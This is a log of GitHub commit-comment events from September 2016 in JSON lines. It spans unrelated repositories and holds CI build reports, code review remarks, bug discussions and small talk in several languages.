{"id":"4600878291","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19126051,"position":null,"line":null,"path":null,"commit_id":"0b017137865933ed5a816c79a87b317e32fee956","created_at":"2016-09-22T07:43:06Z","updated_at":"2016-09-22T07:43:06Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 5.3.6-beta.3](http://build.prxm.it:8813/viewLog.html?buildId=3670&buildTypeId=nes_mongo_build&guest=1) outcome was **FAILURE**\nSummary: Cannot start build runner; runner failure (new) Build time: 00:02:01"}},"created_at":"2016-09-22T07:43:06Z"}
{"id":"4600880007","type":"CommitCommentEvent","actor":{"login":"sbourdeauducq"},"repo":{"name":"m-labs/artiq"},"payload":{"comment":{"id":19126057,"position":null,"line":null,"path":null,"commit_id":"a0291ceddc19c445419754a26df04cb71fe9b699","created_at":"2016-09-22T07:43:35Z","updated_at":"2016-09-22T07:43:35Z","body":"I would like to remove the test mode at some point; its main purpose is to allow low-level access to the DDS, but we can now move the DDS logic into ARTIQ-Python and have it use the normal rtio syscalls. The test mode would just become an \"experiment\"."}},"created_at":"2016-09-22T07:43:35Z"}
{"id":"4600882095","type":"CommitCommentEvent","actor":{"login":"takechi"},"repo":{"name":"takechi/Avestan"},"payload":{"comment":{"id":19126060,"position":null,"line":null,"path":null,"commit_id":"de228f4d432e58d969a202f6d6f65f2280650b3e","created_at":"2016-09-22T07:44:07Z","updated_at":"2016-09-22T07:44:07Z","body":"Python-3.5 でのスクリプト拡張に対応。\r\n（今まではコンパイルを通しただけで、スクリプト拡張機能は使えない状態だった）\r\nPY_MAJOR_VERSION で場合分けはしているものの、多分 Python-3.x でしか動かない。"}},"created_at":"2016-09-22T07:44:07Z"}
{"id":"4600886033","type":"CommitCommentEvent","actor":{"login":"mbrs"},"repo":{"name":"DPAMZZ/junk"},"payload":{"comment":{"id":19126065,"position":35,"line":35,"path":"var_portfolio.py","commit_id":"ffe4aa01015fdc894e84db000666b0580f7833de","created_at":"2016-09-22T07:45:14Z","updated_at":"2016-09-22T07:45:14Z","body":"this is what changed?\r\n"}},"created_at":"2016-09-22T07:45:14Z"}
{"id":"4600887542","type":"CommitCommentEvent","actor":{"login":"Persephone"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19126069,"position":null,"line":null,"path":null,"commit_id":"55ac0186cc7b716a150f17daf755244cc58a6241","created_at":"2016-09-22T07:45:38Z","updated_at":"2016-09-22T07:45:38Z","body":"Any idea why this is happening on ubuntu 14.04 after the recent movement changes?\r\n\r\n../game/libgame.a(MotionMaster.cpp.o): In function `MotionMaster::MoveAlongSplineChain(unsigned int, std::vector<SplineChainLink, std::allocator<SplineChainLink> > const&, bool)':\r\nMotionMaster.cpp:(.text+0x1b93): undefined reference to `vtable for SplineChainMovementGenerator'\r\n../game/libgame.a(MotionMaster.cpp.o): In function `MotionMaster::MoveAlongSplineChain(unsigned int, unsigned short, bool)':\r\nMotionMaster.cpp:(.text+0x1ca6): undefined reference to `vtable for SplineChainMovementGenerator'\r\n../game/libgame.a(MotionMaster.cpp.o): In function `MotionMaster::ResumeSplineChain(SplineChainResumeInfo const&)':\r\nMotionMaster.cpp:(.text+0x268e): undefined reference to `vtable for SplineChainMovementGenerator'\r\n\r\nHave browsed them, can't seem to find any reference to \"vtable\" ?"}},"created_at":"2016-09-22T07:45:38Z"}
{"id":"4600889498","type":"CommitCommentEvent","actor":{"login":"njirap"},"repo":{"name":"andela-aabdulwahab/pilxel"},"payload":{"comment":{"id":19126072,"position":5,"line":5,"path":"django_photo_application/pilxel/tests/test_manipulate.py","commit_id":"91dc16a304ca3abd177c0a30cfd5fdc52f701e88","created_at":"2016-09-22T07:46:12Z","updated_at":"2016-09-22T07:46:12Z","body":"it would appear we don't need this"}},"created_at":"2016-09-22T07:46:12Z"}
{"id":"4600892668","type":"CommitCommentEvent","actor":{"login":"njirap"},"repo":{"name":"andela-aabdulwahab/pilxel"},"payload":{"comment":{"id":19126076,"position":6,"line":6,"path":"django_photo_application/pilxel/tests/test_manipulate.py","commit_id":"91dc16a304ca3abd177c0a30cfd5fdc52f701e88","created_at":"2016-09-22T07:47:07Z","updated_at":"2016-09-22T07:47:07Z","body":"maybe neither this one too."}},"created_at":"2016-09-22T07:47:07Z"}
{"id":"4600892850","type":"CommitCommentEvent","actor":{"login":"JTomHuang"},"repo":{"name":"JTomHuang/git-yao"},"payload":{"comment":{"id":19126077,"position":null,"line":null,"path":null,"commit_id":"61b039f4a495770026e64c766e6c16441850c7d7","created_at":"2016-09-22T07:47:10Z","updated_at":"2016-09-22T07:47:10Z","body":"git status\r\n"}},"created_at":"2016-09-22T07:47:10Z"}
{"id":"4600893825","type":"CommitCommentEvent","actor":{"login":"karussell"},"repo":{"name":"graphhopper/directions-api-clients-route-optimization"},"payload":{"comment":{"id":19126078,"position":9,"line":124,"path":"csharp/src/IO.Swagger.Test/Model/ActivityTests.cs","commit_id":"4b716298cc603e4efd34c75268bc2774620309af","created_at":"2016-09-22T07:47:25Z","updated_at":"2016-09-22T07:47:25Z","body":"I think so but I'm unsure how updates are handled."}},"created_at":"2016-09-22T07:47:25Z"}
{"id":"4600896610","type":"CommitCommentEvent","actor":{"login":"JTomHuang"},"repo":{"name":"JTomHuang/git-yao"},"payload":{"comment":{"id":19126082,"position":2,"line":4,"path":"readme.txt","commit_id":"61b039f4a495770026e64c766e6c16441850c7d7","created_at":"2016-09-22T07:48:10Z","updated_at":"2016-09-22T07:48:10Z","body":"这是注意，不能随便改"}},"created_at":"2016-09-22T07:48:10Z"}
{"id":"4600899285","type":"CommitCommentEvent","actor":{"login":"sbourdeauducq"},"repo":{"name":"m-labs/artiq"},"payload":{"comment":{"id":19126090,"position":null,"line":null,"path":null,"commit_id":"a0291ceddc19c445419754a26df04cb71fe9b699","created_at":"2016-09-22T07:48:53Z","updated_at":"2016-09-22T07:48:53Z","body":"Also, we will put a soft CPU into the Sayma cards, since that will make DDR3 initialization much easier. So SPI bit-banging would be the best choice."}},"created_at":"2016-09-22T07:48:53Z"}
{"id":"4600901294","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19126093,"position":null,"line":null,"path":null,"commit_id":"996be0d3f33286dc388c98a37000e0996fbda09e","created_at":"2016-09-22T07:49:25Z","updated_at":"2016-09-22T07:49:25Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 5.3.6-beta.4](http://build.prxm.it:8813/viewLog.html?buildId=3671&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72 Build time: 00:02:47"}},"created_at":"2016-09-22T07:49:25Z"}
{"id":"4600901312","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19126094,"position":null,"line":null,"path":null,"commit_id":"996be0d3f33286dc388c98a37000e0996fbda09e","created_at":"2016-09-22T07:49:26Z","updated_at":"2016-09-22T07:49:26Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 5.3.6-beta.4](http://build.prxm.it:8813/viewLog.html?buildId=3671&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72 Build time: 00:02:47"}},"created_at":"2016-09-22T07:49:26Z"}
{"id":"4600904772","type":"CommitCommentEvent","actor":{"login":"CristianLema"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":19126099,"position":null,"line":null,"path":null,"commit_id":"dd363f081e9108129ec53119b650e97b7310483d","created_at":"2016-09-22T07:50:20Z","updated_at":"2016-09-22T07:50:20Z","body":"É que pra min que vai ser máis lioso e largo facer como ti me dis. Porque agora á hora de facer\r\n`<temp:plantillas title=\"Inicio - Administrador\" type=\"XXXX\" pos=\"index\">`\r\nEn XXXX tan solo teño que poñer un \"${myUser.user_tipo }\" (como se chame), o cal o que fai é escollerme en _MenuTag.java_ cal é o menú que lle toca. Da maneira que ti me dis obligarame a facer varios \"ifs\" en cada jsp/servlet (según o caso), para coller un menú que toca, estilo:\r\n`<c:choose>`\r\n`  <c:when test=\"${myUser.user_tipo == 0 }\">`\r\n`      <%@ include file='/menuVisitor.html'%>`\r\n`  </c:when>`\r\n`  <c:when test=\"${myUser.user_tipo == 1 }\">`\r\n`      <%@ include file='/menuUsuario.html'%>`\r\n`  </c:when>`\r\n`  <c:when test=\"${myUser.user_tipo == 9 }\">`\r\n`      <%@ include file='/menuAdmin.html'%>`\r\n`  </c:when>`\r\n`</c:choose>`\r\nEn **CADA** jsp/servlet\r\nMoito máis cómodo como está, non?\r\n\r\n\r\n> Os tags, mellor úsaos cando non teñas máis remedio de usar Java (en caso de necesitares acceso a base de datos por ejemplo)\r\n\r\nEu estou accedendo á base de datos sen usar tags, só servlets e hibernate.\r\n"}},"created_at":"2016-09-22T07:50:20Z"}
{"id":"4600904886","type":"CommitCommentEvent","actor":{"login":"evolution23"},"repo":{"name":"asciimoo/searx"},"payload":{"comment":{"id":19126100,"position":4,"line":724,"path":"searx/webapp.py","commit_id":"8d4dd3c5153d8e2990c36d727c812df16c38764c","created_at":"2016-09-22T07:50:22Z","updated_at":"2016-09-22T07:50:22Z","body":"404"}},"created_at":"2016-09-22T07:50:22Z"}
{"id":"4600906868","type":"CommitCommentEvent","actor":{"login":"evolution23"},"repo":{"name":"asciimoo/searx"},"payload":{"comment":{"id":19126104,"position":4,"line":724,"path":"searx/webapp.py","commit_id":"8d4dd3c5153d8e2990c36d727c812df16c38764c","created_at":"2016-09-22T07:50:55Z","updated_at":"2016-09-22T07:50:55Z","body":"724"}},"created_at":"2016-09-22T07:50:55Z"}
{"id":"4600907297","type":"CommitCommentEvent","actor":{"login":"PeterEmil"},"repo":{"name":"rojcyk/blueprint"},"payload":{"comment":{"id":19126106,"position":null,"line":null,"path":null,"commit_id":"2fe7a085a380b114207c44cc4cd083f6d67fe4b9","created_at":"2016-09-22T07:51:03Z","updated_at":"2016-09-22T07:51:03Z","body":"Great resource! Only issue I find is when opening Sketch with blueprint.sketch I get notification that the used SFUI fonts are missing on my machine..."}},"created_at":"2016-09-22T07:51:03Z"}
{"id":"4600908371","type":"CommitCommentEvent","actor":{"login":"ryanpconnors"},"repo":{"name":"ryanpconnors/MrRobot"},"payload":{"comment":{"id":19126107,"position":null,"line":null,"path":null,"commit_id":"252ce8402b167f19019f6044114fb17d10583709","created_at":"2016-09-22T07:51:20Z","updated_at":"2016-09-22T07:51:20Z","body":"I have allotted 47 minutes 51 seconds for the ARG tonight. Sadly, my time is up."}},"created_at":"2016-09-22T07:51:20Z"}
{"id":"4600908766","type":"CommitCommentEvent","actor":{"login":"evolution23"},"repo":{"name":"asciimoo/searx"},"payload":{"comment":{"id":19126108,"position":4,"line":724,"path":"searx/webapp.py","commit_id":"8d4dd3c5153d8e2990c36d727c812df16c38764c","created_at":"2016-09-22T07:51:26Z","updated_at":"2016-09-22T07:51:26Z","body":"https://github.com/asciimoo/searx/commit/8d4dd3c5153d8e2990c36d727c812df16c38764c#commitcomment-19126100"}},"created_at":"2016-09-22T07:51:26Z"}
{"id":"4600912464","type":"CommitCommentEvent","actor":{"login":"jorgesumle"},"repo":{"name":"RafaelAybar/Charla-sobre-bash-nivel-basico"},"payload":{"comment":{"id":19126119,"position":null,"line":null,"path":null,"commit_id":"a37a411c9a86daaf0d1d4ce1c40b9b93630d476e","created_at":"2016-09-22T07:52:25Z","updated_at":"2016-09-22T07:52:25Z","body":"```\r\nelse \r\nif [ $respuesta = ‘no’ ]\r\n    echo “menos mal”\r\nfi\r\nfi\r\n```\r\nQueda mejor un elif, no?\r\n```\r\nelif [ $respuesta = 'no' ]\r\n    then\r\n    echo \"menos mal\"\r\nfi\r\n```\r\no solo un else:\r\n```\r\nelse\r\n    echo \"menos mal\"\r\nfi\r\n```"}},"created_at":"2016-09-22T07:52:25Z"}
{"id":"4600913052","type":"CommitCommentEvent","actor":{"login":"shminer"},"repo":{"name":"shminer/android_kernel_lge_g5"},"payload":{"comment":{"id":19126121,"position":null,"line":null,"path":null,"commit_id":"8b952a394f85f2720524743967108988cd54377f","created_at":"2016-09-22T07:52:35Z","updated_at":"2016-09-22T07:52:35Z","body":"LG Audio HAL has huge difference with CAF Audio HAL. We just keep our codes until LG update audio HAL, maybe Nougat source?"}},"created_at":"2016-09-22T07:52:35Z"}
{"id":"4600913761","type":"CommitCommentEvent","actor":{"login":"KevinBrogan"},"repo":{"name":"TechEmpower/FrameworkBenchmarks"},"payload":{"comment":{"id":19126124,"position":null,"line":null,"path":null,"commit_id":"e495d29abb1c9ddae0c1a994b13730f26c701ac6","created_at":"2016-09-22T07:52:46Z","updated_at":"2016-09-22T07:52:46Z","body":"The filename aux.* is a reserved name in windows. The file aux.go can not be created on any Windows platform, making the source code unusable on all windows platforms."}},"created_at":"2016-09-22T07:52:46Z"}
{"id":"4600914393","type":"CommitCommentEvent","actor":{"login":"rouazana"},"repo":{"name":"linagora/james-project"},"payload":{"comment":{"id":19126126,"position":13,"line":204,"path":"mailbox/maildir/src/main/java/org/apache/james/mailbox/maildir/MaildirFolder.java","commit_id":"827b0336fe7d3816416453da4a7b71a79009f6d9","created_at":"2016-09-22T07:52:57Z","updated_at":"2016-09-22T07:52:57Z","body":"not optimal in case of empty maildir"}},"created_at":"2016-09-22T07:52:57Z"}
{"id":"4600914756","type":"CommitCommentEvent","actor":{"login":"evolution23"},"repo":{"name":"asciimoo/searx"},"payload":{"comment":{"id":19126129,"position":4,"line":724,"path":"searx/webapp.py","commit_id":"8d4dd3c5153d8e2990c36d727c812df16c38764c","created_at":"2016-09-22T07:53:03Z","updated_at":"2016-09-22T07:53:03Z","body":"https://github.com/asciimoo/searx/commit/8d4dd3c5153d8e2990c36d727c812df16c38764c#commitcomment-19126100"}},"created_at":"2016-09-22T07:53:03Z"}
{"id":"4600915032","type":"CommitCommentEvent","actor":{"login":"prik"},"repo":{"name":"part-up/part-up"},"payload":{"comment":{"id":19126131,"position":null,"line":null,"path":null,"commit_id":"4606fc3310aec3b8ab08a581f2b15cb3f8cdc33d","created_at":"2016-09-22T07:53:08Z","updated_at":"2016-09-22T07:53:08Z","body":"@ralphboeije no, since this page always has to have 2 columns, the amount of columns doesn't have to be calculated.\r\n\r\n"}},"created_at":"2016-09-22T07:53:08Z"}
{"id":"4600915248","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":19126132,"position":null,"line":null,"path":null,"commit_id":"dd363f081e9108129ec53119b650e97b7310483d","created_at":"2016-09-22T07:53:11Z","updated_at":"2016-09-22T07:53:11Z","body":"No, non che digo de facer un template para cada menu (que tamen o podrías facer en non che caerían as uñas), digo de reemplazar o que tes feito en java (o mismo) en JSP (en JSP tamen podes facer swtich-case: http://stackoverflow.com/questions/7606599/switch-case-with-display-tag)"}},"created_at":"2016-09-22T07:53:11Z"}
{"id":"4600915918","type":"CommitCommentEvent","actor":{"login":"NBruderman"},"repo":{"name":"night/BetterTTV"},"payload":{"comment":{"id":19126133,"position":null,"line":null,"path":null,"commit_id":"a63f3a3b09fae2a9dfe330fd7fbde1b158686eff","created_at":"2016-09-22T07:53:21Z","updated_at":"2016-09-22T07:53:21Z","body":"Seems that the issue is gone now, so it's all great again :)"}},"created_at":"2016-09-22T07:53:21Z"}
{"id":"4600918483","type":"CommitCommentEvent","actor":{"login":"bestony"},"repo":{"name":"bestony/LCTT-Helper"},"payload":{"comment":{"id":19126141,"position":null,"line":null,"path":null,"commit_id":"a8cc6f3391079215ecb99245c61757f770bacd49","created_at":"2016-09-22T07:54:02Z","updated_at":"2016-09-22T07:54:02Z","body":"#2  已完成"}},"created_at":"2016-09-22T07:54:02Z"}
{"id":"4600918546","type":"CommitCommentEvent","actor":{"login":"touilleMan"},"repo":{"name":"Scille/umongo"},"payload":{"comment":{"id":19126142,"position":23,"line":91,"path":"umongo/data_proxy.py","commit_id":"1dd4076998c4171e2482bd4609933c761311e2e2","created_at":"2016-09-22T07:54:02Z","updated_at":"2016-09-22T07:54:02Z","body":"corrected in 6b01362 👍 "}},"created_at":"2016-09-22T07:54:02Z"}
{"id":"4600923449","type":"CommitCommentEvent","actor":{"login":"kyzentun"},"repo":{"name":"dguzek/Simply-Love-SM5"},"payload":{"comment":{"id":19126152,"position":null,"line":null,"path":null,"commit_id":"f6e818ae23790a60aef244c8ce4417654537f0e2","created_at":"2016-09-22T07:55:20Z","updated_at":"2016-09-22T07:55:20Z","body":"Related stepmania commit: https://github.com/stepmania/stepmania/commit/e05690859fbb14aa08efab8e4b510b4fbcb94fff\r\n\r\nThe \"false\" entry in the child table caused iLen to be shorter than the actual length of the table.  iLen is used to detect whether an integer indexed table has already been added.\r\n\r\nIn your case, there are 6 entries in the table, ```{P1_SubmissiveScoring, P1_PerColumnJudgment, false, P2_SubmissiveScoring, P2_PerColumnJudgment, false}```\r\nNodeNamesToAdd.size comes out to 4, and the names are 1, 2, 4, 5.  5 is greater than 4, so the code thought it was an entry past the end of the array, an entry that had not already been added.\r\n\r\nSo P2_PerColumnJudgment got duplicated."}},"created_at":"2016-09-22T07:55:20Z"}
{"id":"4600927122","type":"CommitCommentEvent","actor":{"login":"thinkpad4"},"repo":{"name":"night/BetterTTV"},"payload":{"comment":{"id":19126158,"position":null,"line":null,"path":null,"commit_id":"a63f3a3b09fae2a9dfe330fd7fbde1b158686eff","created_at":"2016-09-22T07:56:17Z","updated_at":"2016-09-22T07:56:17Z","body":"Still seems to be happening"}},"created_at":"2016-09-22T07:56:17Z"}
{"id":"4600927809","type":"CommitCommentEvent","actor":{"login":"slavapestov"},"repo":{"name":"apple/swift-lldb"},"payload":{"comment":{"id":19126162,"position":null,"line":null,"path":null,"commit_id":"121a68e62aa2fb6706af243d1a74c41fc8528536","created_at":"2016-09-22T07:56:27Z","updated_at":"2016-09-22T07:56:27Z","body":"Why did you add this back, was there a failing test?"}},"created_at":"2016-09-22T07:56:27Z"}
{"id":"4600930786","type":"CommitCommentEvent","actor":{"login":"ChingPin"},"repo":{"name":"ChingPin/exampleLab"},"payload":{"comment":{"id":19126168,"position":null,"line":null,"path":null,"commit_id":"f847ab09f867ff17c4972b3ad70868ea3d40429e","created_at":"2016-09-22T07:57:14Z","updated_at":"2016-09-22T07:57:14Z","body":"Edit my comment"}},"created_at":"2016-09-22T07:57:14Z"}
{"id":"4600942151","type":"CommitCommentEvent","actor":{"login":"ObviousLeeGitHub"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":19126188,"position":null,"line":null,"path":null,"commit_id":"e8f12db27bf62c3a1036d9c81e39c87833647ba6","created_at":"2016-09-22T08:00:05Z","updated_at":"2016-09-22T08:00:05Z","body":"Yay! 👍 "}},"created_at":"2016-09-22T08:00:05Z"}
{"id":"4600942465","type":"CommitCommentEvent","actor":{"login":"Adrianzatreanu"},"repo":{"name":"coala/coala"},"payload":{"comment":{"id":19126189,"position":5,"line":13,"path":"coalib/results/result_actions/PrintMoreInfoAction.py","commit_id":"28bb7ebfecd2989071ece1a1fe3f38326675f8a0","created_at":"2016-09-22T08:00:09Z","updated_at":"2016-09-22T08:00:09Z","body":"Im not sure this is enough to keep its meaning, even thouhh its shorter indeed.\r\nI think \"Print more info\" would be short, and have same meaning as before?"}},"created_at":"2016-09-22T08:00:09Z"}
{"id":"4600945923","type":"CommitCommentEvent","actor":{"login":"gyrog"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19126200,"position":null,"line":null,"path":null,"commit_id":"148fcbc57e5747a665fb4ee78d9a8270e28d08cd","created_at":"2016-09-22T08:00:58Z","updated_at":"2016-09-22T08:00:58Z","body":"pupmode=3 is for full installs, so it doesn't belong in the init iniside initrd.gz, anyway.\r\nMaybe it's somewhere in the code that starts full installs.\r\n"}},"created_at":"2016-09-22T08:00:58Z"}
{"id":"4600945942","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"150balbes/lib"},"payload":{"comment":{"id":19126201,"position":null,"line":null,"path":null,"commit_id":"c9c653a4d742fcbfdbcf5f7a4a59360bc97d3297","created_at":"2016-09-22T08:00:59Z","updated_at":"2016-09-22T08:00:59Z","body":"arm64 supports starts with Jessie, not relevant for S905 board but for others."}},"created_at":"2016-09-22T08:00:59Z"}
{"id":"4600946521","type":"CommitCommentEvent","actor":{"login":"tbeu"},"repo":{"name":"madler/zlib"},"payload":{"comment":{"id":19126202,"position":null,"line":null,"path":null,"commit_id":"33a7aff45da511c3fc181071394ad9a01d5e8d61","created_at":"2016-09-22T08:01:07Z","updated_at":"2016-09-22T08:01:07Z","body":"There are more typos to be fixed throughout the repo, see https://github.com/madler/zlib/pulls?q=typo."}},"created_at":"2016-09-22T08:01:07Z"}
{"id":"4600947128","type":"CommitCommentEvent","actor":{"login":"NBruderman"},"repo":{"name":"night/BetterTTV"},"payload":{"comment":{"id":19126205,"position":null,"line":null,"path":null,"commit_id":"a63f3a3b09fae2a9dfe330fd7fbde1b158686eff","created_at":"2016-09-22T08:01:16Z","updated_at":"2016-09-22T08:01:16Z","body":"I take it back :/ It worked, but now it's gone again. Even on the same channel. Only the first time works, after that, it's gone for all the channels until I restart my computer..."}},"created_at":"2016-09-22T08:01:16Z"}
{"id":"4600947359","type":"CommitCommentEvent","actor":{"login":"frmz"},"repo":{"name":"afollestad/polar-dashboard"},"payload":{"comment":{"id":19126206,"position":null,"line":null,"path":null,"commit_id":"d1503ad17b1e143c52c6c9176f8b3b666e8f546e","created_at":"2016-09-22T08:01:19Z","updated_at":"2016-09-22T08:01:19Z","body":"@afollestad please revert this, Kustom filters activities by action within the Provider, so if you have this always in the list then Kustom will show the package in the list of available skins installed even if the provider for that feature is empty (i am not checking if the provider is empty before listing because of a complex issue i wont detail with some app like Greenify)"}},"created_at":"2016-09-22T08:01:19Z"}
{"id":"4600948597","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19126207,"position":null,"line":null,"path":null,"commit_id":"87ea06c98b4f302d057d314c30b2ea5c29110b59","created_at":"2016-09-22T08:01:37Z","updated_at":"2016-09-22T08:01:37Z","body":"Note that we already have `haxe.extern.Rest`, so maybe you could just have something like this instead:\r\n```haxe\r\nstatic function printf(format:ConstCharStar, args:Rest<Dynamic>):Void;\r\n```"}},"created_at":"2016-09-22T08:01:37Z"}
{"id":"4600954006","type":"CommitCommentEvent","actor":{"login":"bestony"},"repo":{"name":"bestony/LCTT-Helper"},"payload":{"comment":{"id":19126217,"position":null,"line":null,"path":null,"commit_id":"fd378dfa069f90161b8e50769ddc96596b968cd6","created_at":"2016-09-22T08:02:58Z","updated_at":"2016-09-22T08:02:58Z","body":" #7  已完成"}},"created_at":"2016-09-22T08:02:58Z"}
{"id":"4600954155","type":"CommitCommentEvent","actor":{"login":"lyhcode"},"repo":{"name":"trunk-studio/cargocms"},"payload":{"comment":{"id":19126218,"position":null,"line":null,"path":null,"commit_id":"5337222b2032d4a90c212f5eaa2f44464317912b","created_at":"2016-09-22T08:03:00Z","updated_at":"2016-09-22T08:03:00Z","body":"commit 之前要注意有沒有多餘的 LOG 檔被 add"}},"created_at":"2016-09-22T08:03:00Z"}
{"id":"4600955320","type":"CommitCommentEvent","actor":{"login":"ilanpillemer"},"repo":{"name":"ilanpillemer/real1ty"},"payload":{"comment":{"id":19126219,"position":null,"line":null,"path":null,"commit_id":"d1e3858284ee437c12eadf94173b3f2d87ae3162","created_at":"2016-09-22T08:03:19Z","updated_at":"2016-09-22T08:03:19Z","body":"I can't stand intellij, reverting to eclipse to see if that will get eclim working for emacs."}},"created_at":"2016-09-22T08:03:19Z"}
{"id":"4600955715","type":"CommitCommentEvent","actor":{"login":"hvr"},"repo":{"name":"hvr/multi-ghc-travis"},"payload":{"comment":{"id":19126221,"position":4,"line":146,"path":"make_travis_yml_2.hs","commit_id":"1b6dc0aa9c42ab9e0c4bf47c30fdec8fedddee68","created_at":"2016-09-22T08:03:25Z","updated_at":"2016-09-22T08:03:25Z","body":"In the past the `-j` value was overestimated for Travis' VMs (it would help if cabal would emit the info \"using $N threads\"), also the memory is limited (4GiB) so we want to make sure that it's really detected properly"}},"created_at":"2016-09-22T08:03:25Z"}
{"id":"4600961578","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19126233,"position":null,"line":null,"path":null,"commit_id":"be49ee5145169a92fd9fc06827a1e6ba7ca0385b","created_at":"2016-09-22T08:05:00Z","updated_at":"2016-09-22T08:05:00Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2375 of 2375 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be49ee5145169a92fd9fc06827a1e6ba7ca0385b-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be49ee5145169a92fd9fc06827a1e6ba7ca0385b-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-22T08:05:00Z"}
{"id":"4600964239","type":"CommitCommentEvent","actor":{"login":"gyrog"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19126235,"position":null,"line":null,"path":null,"commit_id":"148fcbc57e5747a665fb4ee78d9a8270e28d08cd","created_at":"2016-09-22T08:05:40Z","updated_at":"2016-09-22T08:05:40Z","body":"Maybe pupmode=3 was never implemened?? I don't know.\r\nPuppy has  long history of focusing on frugal installs."}},"created_at":"2016-09-22T08:05:40Z"}
{"id":"4600968656","type":"CommitCommentEvent","actor":{"login":"sainbayarbattur"},"repo":{"name":"sainbayarbattur/cookbook"},"payload":{"comment":{"id":19126240,"position":null,"line":null,"path":null,"commit_id":"7043b1298ac5c628689cf348654227bb548ce7d1","created_at":"2016-09-22T08:06:47Z","updated_at":"2016-09-22T08:06:47Z","body":"Hi from git"}},"created_at":"2016-09-22T08:06:47Z"}
{"id":"4600970417","type":"CommitCommentEvent","actor":{"login":"CristianLema"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":19126245,"position":null,"line":null,"path":null,"commit_id":"dd363f081e9108129ec53119b650e97b7310483d","created_at":"2016-09-22T08:07:14Z","updated_at":"2016-09-22T08:07:14Z","body":"Xa sei que existen switch-cases en jstl, de feito escribín un no comentario anterior....\r\nEntón o que dis é que sustitúa o _MenuTag.java_ por un _MenuTag.jsp_ que faría exactamente os mesmos cálculos, e dente a plantilla o que faría sería chamar a este jsp en vez do java para construir o menú, non?"}},"created_at":"2016-09-22T08:07:14Z"}
{"id":"4600975915","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":19126247,"position":null,"line":null,"path":null,"commit_id":"dd363f081e9108129ec53119b650e97b7310483d","created_at":"2016-09-22T08:08:24Z","updated_at":"2016-09-22T08:08:24Z","body":"Ah, non me fijara que era un switch-case.\r\nExacto, todo esto para evitar HTML dentro dunha clase Java"}},"created_at":"2016-09-22T08:08:24Z"}
{"id":"4600977561","type":"CommitCommentEvent","actor":{"login":"hughsando"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19126251,"position":null,"line":null,"path":null,"commit_id":"87ea06c98b4f302d057d314c30b2ea5c29110b59","created_at":"2016-09-22T08:08:49Z","updated_at":"2016-09-22T08:08:49Z","body":"Great - I was going to ask about this.\r\n"}},"created_at":"2016-09-22T08:08:49Z"}
{"id":"4600979507","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19126252,"position":null,"line":null,"path":null,"commit_id":"be49ee5145169a92fd9fc06827a1e6ba7ca0385b","created_at":"2016-09-22T08:09:20Z","updated_at":"2016-09-22T08:09:20Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be49ee5145169a92fd9fc06827a1e6ba7ca0385b-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T08:09:20Z"}
{"id":"4600979517","type":"CommitCommentEvent","actor":{"login":"jordens"},"repo":{"name":"m-labs/artiq"},"payload":{"comment":{"id":19126253,"position":null,"line":null,"path":null,"commit_id":"a0291ceddc19c445419754a26df04cb71fe9b699","created_at":"2016-09-22T08:09:20Z","updated_at":"2016-09-22T08:09:20Z","body":"The test mode can go if we can replace it by some other kind of \"shell\". I am just using it as a debugging tool now and it's perfectly fine and usable for that.\r\nPretty sure will need the soft-cpu also for a bunch of other things. The gateware spi core is also working perfectly fine. I see no reason to additionally implement bit banging. And as I said some time ago, people will ultimately want to issue (RTIO-) timed SPI commands to the DACs. I'd like to keep the gateware version.\r\n"}},"created_at":"2016-09-22T08:09:20Z"}
